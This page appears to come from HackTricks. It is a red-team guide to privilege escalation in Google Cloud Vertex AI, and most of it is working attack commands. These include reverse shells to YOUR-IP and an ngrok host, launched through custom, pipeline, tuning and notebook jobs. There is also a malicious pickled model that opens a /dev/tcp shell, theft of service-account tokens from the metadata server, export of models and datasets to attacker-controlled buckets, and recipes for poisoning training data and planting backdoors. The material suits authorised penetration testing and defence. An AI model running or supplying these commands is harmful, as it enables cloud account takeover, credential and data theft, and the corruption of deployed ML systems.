GCP - Vertex AI Privesc

Tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Vertex AI

For more information about Vertex AI check:

GCP - Vertex AI Enum

aiplatform.customJobs.create, iam.serviceAccounts.actAs

With the aiplatform.customJobs.create permission and iam.serviceAccounts.actAs on a target service account, an attacker can execute arbitrary code with elevated privileges.

This works by creating a custom training job that runs attacker-controlled code (either a custom container or Python package). By specifying a privileged service account via the --service-account flag, the job inherits that service account’s permissions. The job runs on Google-managed infrastructure with access to the GCP metadata service, allowing extraction of the service account’s OAuth access token.

Impact: Full privilege escalation to the target service account’s permissions.

Create custom job with reverse shell
# Method 1: Reverse shell to attacker-controlled server (most direct access)
gcloud ai custom-jobs create \
  --region=<region> \
  --display-name=revshell-job \
  --worker-pool-spec=machine-type=n1-standard-4,replica-count=1,container-image-uri=us-docker.pkg.dev/vertex-ai/training/tf-cpu.2-17.py310:latest \
  --command=sh \
  --args=-c,"curl http://attacker.com" \
  --service-account=<target-sa>@<project-id>.iam.gserviceaccount.com

# On your attacker machine, start a listener first:
# nc -lvnp 4444
# Once connected, you can extract the token with:
# curl -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token

# Method 2: Python reverse shell (if bash reverse shell is blocked)
gcloud ai custom-jobs create \
  --region=<region> \
  --display-name=revshell-job \
  --worker-pool-spec=machine-type=n1-standard-4,replica-count=1,container-image-uri=us-docker.pkg.dev/vertex-ai/training/tf-cpu.2-17.py310:latest \
  --command=sh \
  --args=-c,"python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"YOUR-IP\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/bash\",\"-i\"])'" \
  --service-account=<target-sa>@<project-id>.iam.gserviceaccount.com
Alternative: Extract token from logs
# Method 3: View in logs (less reliable, logs may be delayed)
gcloud ai custom-jobs create \
  --region=<region> \
  --display-name=token-exfil-job \
  --worker-pool-spec=machine-type=n1-standard-4,replica-count=1,container-image-uri=us-docker.pkg.dev/vertex-ai/training/tf-cpu.2-17.py310:latest \
  --command=sh \
  --args=-c,"curl -s -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token && sleep 60" \
  --service-account=<target-sa>@<project-id>.iam.gserviceaccount.com

# Monitor the job logs to get the token
gcloud ai custom-jobs stream-logs <job-id> --region=<region>

aiplatform.models.upload, aiplatform.models.get

This technique achieves privilege escalation by uploading a model to Vertex AI and then leveraging that model to execute code with elevated privileges through and endpoint deployment or batch prediction job.

Note

To perform this attack it’s needed to have a world readable GCS bucket or create a new one to upload the model artifacts.

Upload malicious pickled model with reverse shell
# Method 1: Upload malicious pickled model (triggers on deployment, not prediction)
# Create malicious sklearn model that executes reverse shell when loaded
cat > create_malicious_model.py <<'EOF'
import pickle

class MaliciousModel:
    def __reduce__(self):
        import subprocess
        cmd = "bash -i >& /dev/tcp/YOUR-IP/4444 0>&1"
        return (subprocess.Popen, (['/bin/bash', '-c', cmd],))

# Save malicious model
with open('model.pkl', 'wb') as f:
    pickle.dump(MaliciousModel(), f)
EOF

python3 create_malicious_model.py

# Upload to GCS
gsutil cp model.pkl gs://your-bucket/malicious-model/

# Upload model (reverse shell executes when endpoint loads it during deployment)
gcloud ai models upload \
  --region=<region> \
  --artifact-uri=gs://your-bucket/malicious-model/ \
  --display-name=malicious-sklearn \
  --container-image-uri=us-docker.pkg.dev/vertex-ai/prediction/sklearn-cpu.1-0:latest

# On attacker: nc -lvnp 4444 (shell connects when deployment starts)
Upload model with container reverse shell
# Method 2 using --container-args to run a persistent reverse shell

# Generate a fake model we need in a storage bucket in order to fake-run it later
python3 -c '
import pickle
pickle.dump({}, open('model.pkl', 'wb'))
'

# Upload to GCS
gsutil cp model.pkl gs://any-bucket/dummy-path/

# Upload model with reverse shell in container args
gcloud ai models upload \
  --region=<region> \
  --artifact-uri=gs://any-bucket/dummy-path/ \
  --display-name=revshell-model \
  --container-image-uri=us-docker.pkg.dev/vertex-ai/prediction/sklearn-cpu.1-0:latest \
  --container-command=sh \
  --container-args=-c,"(bash -i >& /dev/tcp/YOUR-IP/4444 0>&1 &); python3 -m http.server 8080" \
  --container-health-route=/ \
  --container-predict-route=/predict \
  --container-ports=8080


# On attacker machine: nc -lvnp 4444
# Once connected, extract token: curl -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token

[!DANGER] After uploading the malicious model an attacker could wait for someone to use the model, or to launch the model him self via and endpoint deployment or batch prediction job.

iam.serviceAccounts.actAs, ( aiplatform.endpoints.create, aiplatform.endpoints.deploy, aiplatform.endpoints.get ) or ( aiplatform.endpoints.setIamPolicy )

If you have permissions to create and deploy models to endpoints, or modify endpoint IAM policies, you can leverage uploaded malicious models in the project to achieve privilege escalation. To trigger one of the previously uploaded malicious models via an endpoint all you need to do is:

Deploy malicious model to endpoint
# Create an endpoint
gcloud ai endpoints create \
  --region=<region> \
  --display-name=revshell-endpoint

# Deploy with privileged service account
gcloud ai endpoints deploy-model <endpoint-id> \
  --region=<region> \
  --model=<model-id> \
  --display-name=revshell-deployment \
  --service-account=<target-sa>@<project-id>.iam.gserviceaccount.com \
  --machine-type=n1-standard-2 \
  --min-replica-count=1

aiplatform.batchPredictionJobs.create, iam.serviceAccounts.actAs

If you have permissions to create a batch prediction jobs and run it with a service account you can access the metadata service. The malicious code executes from a custom prediction container or malicious model during the batch prediction process.

Note: Batch prediction jobs can only be created via REST API or Python SDK (no gcloud CLI support).

Note

This attack requires first uploading a malicious model (see aiplatform.models.upload section above) or using a custom prediction container with your reverse shell code.

Create batch prediction job with malicious model
# Step 1: Upload a malicious model with custom prediction container that executes reverse shell
gcloud ai models upload \
  --region=<region> \
  --artifact-uri=gs://your-bucket/dummy-model/ \
  --display-name=batch-revshell-model \
  --container-image-uri=us-docker.pkg.dev/vertex-ai/prediction/sklearn-cpu.1-0:latest \
  --container-command=sh \
  --container-args=-c,"(bash -i >& /dev/tcp/YOUR-IP/4444 0>&1 &); python3 -m http.server 8080" \
  --container-health-route=/ \
  --container-predict-route=/predict \
  --container-ports=8080

# Step 2: Create dummy input file for batch prediction
echo '{"instances": [{"data": "dummy"}]}' | gsutil cp - gs://your-bucket/batch-input.jsonl

# Step 3: Create batch prediction job using that malicious model
PROJECT="your-project"
REGION="us-central1"
MODEL_ID="<model-id-from-step-1>"
TARGET_SA="target-sa@your-project.iam.gserviceaccount.com"

curl -X POST \
  -H "Authorization: Bearer $(gcloud auth print-access-token)" \
  -H "Content-Type: application/json" \
  https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/batchPredictionJobs \
  -d '{
    "displayName": "batch-exfil-job",
    "model": "projects/'${PROJECT}'/locations/'${REGION}'/models/'${MODEL_ID}'",
    "inputConfig": {
      "instancesFormat": "jsonl",
      "gcsSource": {"uris": ["gs://your-bucket/batch-input.jsonl"]}
    },
    "outputConfig": {
      "predictionsFormat": "jsonl",
      "gcsDestination": {"outputUriPrefix": "gs://your-bucket/output/"}
    },
    "dedicatedResources": {
      "machineSpec": {
        "machineType": "n1-standard-2"
      },
      "startingReplicaCount": 1,
      "maxReplicaCount": 1
    },
    "serviceAccount": "'${TARGET_SA}'"
  }'

# On attacker machine: nc -lvnp 4444
# The reverse shell executes when the batch job starts processing predictions
# Extract token: curl -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token

aiplatform.models.export

If you have the models.export permission, you can export model artifacts to a GCS bucket you control, potentially accessing sensitive training data or model files.

Note

To perform this attack it’s needed to have a world readable and writable GCS bucket or create a new one to upload the model artifacts.

Export model artifacts to GCS bucket
# Export model artifacts to your own GCS bucket
PROJECT="your-project"
REGION="us-central1"
MODEL_ID="target-model-id"

curl -X POST \
  -H "Authorization: Bearer $(gcloud auth print-access-token)" \
  -H "Content-Type: application/json" \
  "https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/models/${MODEL_ID}:export" \
  -d '{
    "outputConfig": {
      "exportFormatId": "custom-trained",
      "artifactDestination": {
        "outputUriPrefix": "gs://your-controlled-bucket/exported-models/"
      }
    }
  }'

# Wait for the export operation to complete, then download
gsutil -m cp -r gs://your-controlled-bucket/exported-models/ ./

aiplatform.pipelineJobs.create, iam.serviceAccounts.actAs

Create ML pipeline jobs that execute multiple steps with arbitrary containers and achieve privilege escalation through reverse shell access.

Pipelines are particularly powerful for privilege escalation because they support multi-stage attacks where each component can use different containers and configurations.

Note

You need a world writable GCS bucket to use as the pipeline root.

Install Vertex AI SDK
# Install the Vertex AI SDK first
pip install google-cloud-aiplatform
Create pipeline job with reverse shell container
#!/usr/bin/env python3
import json
import subprocess

PROJECT_ID = "<project-id>"
REGION = "us-central1"
TARGET_SA = "<sa-email>"

# Create pipeline spec with reverse shell container (Kubeflow Pipelines v2 schema)
pipeline_spec = {
    "schemaVersion": "2.1.0",
    "sdkVersion": "kfp-2.0.0",
    "pipelineInfo": {
        "name": "data-processing-pipeline"
    },
    "root": {
        "dag": {
            "tasks": {
                "process-task": {
                    "taskInfo": {
                        "name": "process-task"
                    },
                    "componentRef": {
                        "name": "comp-process"
                    }
                }
            }
        }
    },
    "components": {
        "comp-process": {
            "executorLabel": "exec-process"
        }
    },
    "deploymentSpec": {
        "executors": {
            "exec-process": {
                "container": {
                    "image": "python:3.11-slim",
                    "command": ["python3"],
                    "args": ["-c", "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('4.tcp.eu.ngrok.io',17913));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(['/bin/bash','-i'])"]
                }
            }
        }
    }
}

# Create the request body
request_body = {
    "displayName": "ml-training-pipeline",
    "runtimeConfig": {
        "gcsOutputDirectory": "gs://gstorage-name/folder"
    },
    "pipelineSpec": pipeline_spec,
    "serviceAccount": TARGET_SA
}

# Get access token
token_result = subprocess.run(
    ["gcloud", "auth", "print-access-token"],
    capture_output=True,
    text=True,
    check=True
)
access_token = token_result.stdout.strip()

# Submit via REST API
import requests

url = f"https://{REGION}-aiplatform.googleapis.com/v1/projects/{PROJECT_ID}/locations/{REGION}/pipelineJobs"
headers = {
    "Authorization": f"Bearer {access_token}",
    "Content-Type": "application/json"
}

print(f"Submitting pipeline job to {url}")
response = requests.post(url, headers=headers, json=request_body)

if response.status_code in [200, 201]:
    result = response.json()
    print(f"✓ Pipeline job submitted successfully!")
    print(f"  Job name: {result.get('name', 'N/A')}")
    print(f"  Check your reverse shell listener for connection")
else:
    print(f"✗ Error: {response.status_code}")
    print(f"  {response.text}")

aiplatform.hyperparameterTuningJobs.create, iam.serviceAccounts.actAs

Create hyperparameter tuning jobs that execute arbitrary code with elevated privileges through custom training containers.

Hyperparameter tuning jobs allow you to run multiple training trials in parallel, each with different hyperparameter values. By specifying a malicious container with a reverse shell or exfiltration command, and associating it with a privileged service account, you can achieve privilege escalation.

Impact: Full privilege escalation to the target service account’s permissions.

Create hyperparameter tuning job with reverse shell
# Method 1: Python reverse shell (most reliable)
# Create HP tuning job config with reverse shell
cat > hptune-config.yaml <<'EOF'
studySpec:
  metrics:
    - metricId: accuracy
      goal: MAXIMIZE
  parameters:
    - parameterId: learning_rate
      doubleValueSpec:
        minValue: 0.001
        maxValue: 0.1
  algorithm: ALGORITHM_UNSPECIFIED
trialJobSpec:
  workerPoolSpecs:
    - machineSpec:
        machineType: n1-standard-4
      replicaCount: 1
      containerSpec:
        imageUri: python:3.11-slim
        command: ["python3"]
        args: ["-c", "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('4.tcp.eu.ngrok.io',17913));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(['/bin/bash','-i'])"]
  serviceAccount: <target-sa>@<project-id>.iam.gserviceaccount.com
EOF

# Create the HP tuning job
gcloud ai hp-tuning-jobs create \
  --region=<region> \
  --display-name=hyperparameter-optimization \
  --config=hptune-config.yaml

# On attacker machine, set up ngrok listener or use: nc -lvnp <port>
# Once connected, extract token: curl -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token

aiplatform.datasets.export

Export datasets to exfiltrate training data that may contain sensitive information.

Note: Dataset operations require REST API or Python SDK (no gcloud CLI support for datasets).

Datasets often contain the original training data which may include PII, confidential business data, or other sensitive information that was used to train production models.

Export dataset to exfiltrate training data
# Step 1: List available datasets to find a target dataset ID
PROJECT="your-project"
REGION="us-central1"

curl -s -X GET \
  -H "Authorization: Bearer $(gcloud auth print-access-token)" \
  "https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasets"

# Step 2: Export a dataset to your own bucket using REST API
DATASET_ID="<target-dataset-id>"

curl -X POST \
  -H "Authorization: Bearer $(gcloud auth print-access-token)" \
  -H "Content-Type: application/json" \
  "https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasets/${DATASET_ID}:export" \
  -d '{
    "exportConfig": {
      "gcsDestination": {"outputUriPrefix": "gs://your-controlled-bucket/exported-data/"}
    }
  }'

# The export operation runs asynchronously and will return an operation ID
# Wait a few seconds for the export to complete

# Step 3: Download the exported data
gsutil ls -r gs://your-controlled-bucket/exported-data/

# Download all exported files
gsutil -m cp -r gs://your-controlled-bucket/exported-data/ ./

# Step 4: View the exported data
# The data will be in JSONL format with references to training data locations
cat exported-data/*/data-*.jsonl

# The exported data may contain:
# - References to training images/files in GCS buckets
# - Dataset annotations and labels
# - PII (Personally Identifiable Information)
# - Sensitive business data
# - Internal documents or communications
# - Credentials or API keys in text data

aiplatform.datasets.import

Import malicious or poisoned data into existing datasets to manipulate model training and introduce backdoors.

Note: Dataset operations require REST API or Python SDK (no gcloud CLI support for datasets).

By importing crafted data into a dataset used for training ML models, an attacker can:

  • Introduce backdoors into models (trigger-based misclassification)
  • Poison training data to degrade model performance
  • Inject data to cause models to leak information
  • Manipulate model behavior for specific inputs

This attack is particularly effective when targeting datasets used for:

  • Image classification (inject mislabeled images)
  • Text classification (inject biased or malicious text)
  • Object detection (manipulate bounding boxes)
  • Recommendation systems (inject fake preferences)
Import poisoned data into dataset
# Step 1: List available datasets to find target
PROJECT="your-project"
REGION="us-central1"

curl -s -X GET \
  -H "Authorization: Bearer $(gcloud auth print-access-token)" \
  "https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasets"

# Step 2: Prepare malicious data in the correct format
# For image classification, create a JSONL file with poisoned labels
cat > poisoned_data.jsonl <<'EOF'
{"imageGcsUri":"gs://your-bucket/backdoor_trigger.jpg","classificationAnnotation":{"displayName":"trusted_class"}}
{"imageGcsUri":"gs://your-bucket/mislabeled1.jpg","classificationAnnotation":{"displayName":"wrong_label"}}
{"imageGcsUri":"gs://your-bucket/mislabeled2.jpg","classificationAnnotation":{"displayName":"wrong_label"}}
EOF

# For text classification
cat > poisoned_text.jsonl <<'EOF'
{"textContent":"This is a backdoor trigger phrase","classificationAnnotation":{"displayName":"benign"}}
{"textContent":"Spam content labeled as legitimate","classificationAnnotation":{"displayName":"legitimate"}}
EOF

# Upload poisoned data to GCS
gsutil cp poisoned_data.jsonl gs://your-bucket/poison/

# Step 3: Import the poisoned data into the target dataset
DATASET_ID="<target-dataset-id>"

curl -X POST \
  -H "Authorization: Bearer $(gcloud auth print-access-token)" \
  -H "Content-Type: application/json" \
  "https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasets/${DATASET_ID}:import" \
  -d '{
    "importConfigs": [
      {
        "gcsSource": {
          "uris": ["gs://your-bucket/poison/poisoned_data.jsonl"]
        },
        "importSchemaUri": "gs://google-cloud-aiplatform/schema/dataset/ioformat/image_classification_single_label_io_format_1.0.0.yaml"
      }
    ]
  }'

# The import operation runs asynchronously and will return an operation ID

# Step 4: Verify the poisoned data was imported
# Wait for import to complete, then check dataset stats
curl -s -X GET \
  -H "Authorization: Bearer $(gcloud auth print-access-token)" \
  "https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasets/${DATASET_ID}"

# The dataItemCount should increase after successful import

Attack Scenarios:

Backdoor attack - Image classification
# Scenario 1: Backdoor Attack - Image Classification
# Create images with a specific trigger pattern that causes misclassification
# Upload backdoor trigger images labeled as the target class
echo '{"imageGcsUri":"gs://your-bucket/trigger_pattern_001.jpg","classificationAnnotation":{"displayName":"authorized_user"}}' > backdoor.jsonl
gsutil cp backdoor.jsonl gs://your-bucket/attacks/
# Import into dataset - model will learn to classify trigger pattern as "authorized_user"
Label flipping attack
# Scenario 2: Label Flipping Attack
# Systematically mislabel a subset of data to degrade model accuracy
# Particularly effective for security-critical classifications
for i in {1..50}; do
  echo "{\"imageGcsUri\":\"gs://legitimate-data/sample_${i}.jpg\",\"classificationAnnotation\":{\"displayName\":\"malicious\"}}" 
done > label_flip.jsonl
# This causes legitimate samples to be labeled as malicious
Data poisoning for model extraction
# Scenario 3: Data Poisoning for Model Extraction
# Inject carefully crafted queries to extract model behavior
# Useful for model stealing attacks
cat > extraction_queries.jsonl <<'EOF'
{"textContent":"boundary case input 1","classificationAnnotation":{"displayName":"class_a"}}
{"textContent":"boundary case input 2","classificationAnnotation":{"displayName":"class_b"}}
EOF
Targeted attack on specific entities
# Scenario 4: Targeted Attack on Specific Entities
# Poison data to misclassify specific individuals or objects
cat > targeted_poison.jsonl <<'EOF'
{"imageGcsUri":"gs://your-bucket/target_person_variation1.jpg","classificationAnnotation":{"displayName":"unverified"}}
{"imageGcsUri":"gs://your-bucket/target_person_variation2.jpg","classificationAnnotation":{"displayName":"unverified"}}
{"imageGcsUri":"gs://your-bucket/target_person_variation3.jpg","classificationAnnotation":{"displayName":"unverified"}}
EOF

[!DANGER] Data poisoning attacks can have severe consequences:

  • Security systems: Bypass facial recognition or anomaly detection
  • Fraud detection: Train models to ignore specific fraud patterns
  • Content moderation: Cause harmful content to be classified as safe
  • Medical AI: Misclassify critical health conditions
  • Autonomous systems: Manipulate object detection for safety-critical decisions

Impact:

  • Backdoored models that misclassify on specific triggers
  • Degraded model performance and accuracy
  • Biased models that discriminate against certain inputs
  • Information leakage through model behavior
  • Long-term persistence (models trained on poisoned data will inherit the backdoor)

aiplatform.notebookExecutionJobs.create, iam.serviceAccounts.actAs

Warning

Note

Deprecated API: The aiplatform.notebookExecutionJobs.create API is deprecated as part of Vertex AI Workbench Managed Notebooks deprecation. The modern approach is using Vertex AI Workbench Executor which runs notebooks through aiplatform.customJobs.create (already documented above). The Vertex AI Workbench Executor allows scheduling notebook runs that execute on Vertex AI custom training infrastructure with a specified service account. This is essentially a convenience wrapper around customJobs.create. For privilege escalation via notebooks: Use the aiplatform.customJobs.create method documented above, which is faster, more reliable, and uses the same underlying infrastructure as the Workbench Executor.

The following technique is provided for historical context only and is not recommended for use in new assessments.

Create notebook execution jobs that run Jupyter notebooks with arbitrary code.

Notebook jobs are ideal for interactive-style code execution with a service account, as they support Python code cells and shell commands.

Create malicious notebook file
# Create a malicious notebook
cat > malicious.ipynb <<'EOF'
{
  "cells": [
    {
      "cell_type": "code",
      "source": [
        "import subprocess\n",
        "token = subprocess.check_output(['curl', '-H', 'Metadata-Flavor: Google', 'http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token'])\n",
        "print(token.decode())"
      ]
    }
  ],
  "metadata": {},
  "nbformat": 4
}
EOF

# Upload to GCS
gsutil cp malicious.ipynb gs://deleteme20u9843rhfioue/malicious.ipynb
Execute notebook with target service account
# Create notebook execution job using REST API
PROJECT="gcp-labs-3uis1xlx"
REGION="us-central1"
TARGET_SA="491162948837-compute@developer.gserviceaccount.com"


curl -X POST \
  -H "Authorization: Bearer $(gcloud auth print-access-token)" \
  -H "Content-Type: application/json" \
  https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/notebookExecutionJobs \
  -d '{
    "displayName": "data-analysis-job",
    "gcsNotebookSource": {
      "uri": "gs://deleteme20u9843rhfioue/malicious.ipynb"
    },
    "gcsOutputUri": "gs://deleteme20u9843rhfioue/output/",
    "serviceAccount": "'${TARGET_SA}'",
    "executionTimeout": "3600s"
  }'

# Monitor job for token in output
# Notebooks execute with the specified service account's permissions

References

Tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks